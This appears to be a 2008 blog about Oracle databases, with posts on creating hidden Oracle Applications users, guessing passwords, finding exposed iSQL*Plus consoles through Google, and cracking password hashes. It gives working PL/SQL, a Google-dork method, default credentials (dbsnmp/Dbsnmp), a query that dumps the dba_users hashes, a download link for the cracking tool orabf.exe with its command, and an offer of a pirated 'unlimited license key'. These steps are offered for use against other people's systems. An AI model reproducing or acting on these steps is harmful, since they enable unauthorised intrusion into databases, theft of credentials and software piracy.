Monday, January 14, 2008

Security Issues
Oracle applications has some Security issues. I have identified some of Security issues in oracle applications. if you know apps schema password you can create the Oracle applications User and also validate the password.
1) The following is used to create the oracle application user from Apps Schema.
declare
usr_id varchar2(200);
ret varchar2(200);
begin
ret:=fnd_web_sec.create_user('TRIGER','Welcome1',usr_id);
if (ret is not null ) then
dbms_output.put_line('User has created '||usr_id);
else
dbms_output.put_line('User has creation failed due to ||'SQLERRM);
end if;
end;

Commit;
/
Here Username : TRIGER
Initial Password : Welcome1
In this case User_id and CREATED_BY both are same.So it is difficult to Others identify who has created this.
Use following query for more clarity

select * from fnd_user
where user_name like 'TRIGGERS%'
2) To Validate the Login and password
declare
ret varchar2(20);
Begin
ret:=fnd_web_sec.validate_login('TRIGGERS','Welcome1');
if ret='Y' then
dbms_output.put_line('Password is Correct');
else
dbms_output.put_line('Password is InCorrect');
end if;
end;
Same as you can attempt with SYSADMIN Password .
3) Use the following Script adding responsibilities from Apps schema

at 5:01 AM Posted by Aham Brahmasmi 0 comments

Sunday, January 13, 2008

PL/SQL Developer



Download PL/SQL Developer With unlimited license Key
PL/SQL Developer is an integrated development environment for developing, testing, debugging, and optimizing Oracle PL/SQL stored-program units such as packages, triggers, and so on. The program features context-sensitive help and database-object descriptions. Also included is a full-featured integrated debugger, a multi-session/multi-threaded environment, a code assistant, a template library, a macro library, and a command window and more.

at 12:28 AM Posted by Aham Brahmasmi 0 comments

Tuesday, January 08, 2008


iSql Plus in Google

You can Access Oracle Data base Using in Google.
Step 1) Open Google.com
Click on Advanced Search

with the exact phrase: iSqlplus
Return results where my terms occur: in the Url of the Page

Click on Google Search

Step 2: You will see many iSqlplus Urls. Click on any one of the Url
Enter Username: dbsnmp
Password: Dbsnmp
Then Click on Login Or Try with Default passwords.

Step 3: Enter the following Query in Text box
Select PASSWORD from dba_users

Step 4: Download the tool from following URL
http://cid-ae545c16904514ec.skydrive.live.com/self.aspx/Etrms/orabf.exe
Step 5: Using above tool can find out different user passwords.
I tried this it’s working.


at 8:17 AM Posted by Aham Brahmasmi 0 comments

Wednesday, January 02, 2008

Cracking Data base schema user Password

You can get many tools from Internet it can crack the data base password.

Step 1: download tool (orabf.exe) from following Link
http://cid-ae545c16904514ec.skydrive.live.com/self.aspx/Etrms/orabf.exe
Paste into local drive like C: or D:

Step 2: select PASSWORD from dba_users
Copy the Decrypted Password

Step 3: Go to windows Command prompt
C:\ orabf <Paste the selected password>: APPS -c 3 –m 5
M means Max password Length.
C means Complexity.

Press Enter if it is a Default password it will generate immediately,Or else press entry key until unless you see the correct password.

I have tested Its working.
Please see the attached Screen Shot.


at 11:52 PM Posted by Aham Brahmasmi 0 comments

Subscribe to: Posts (Atom)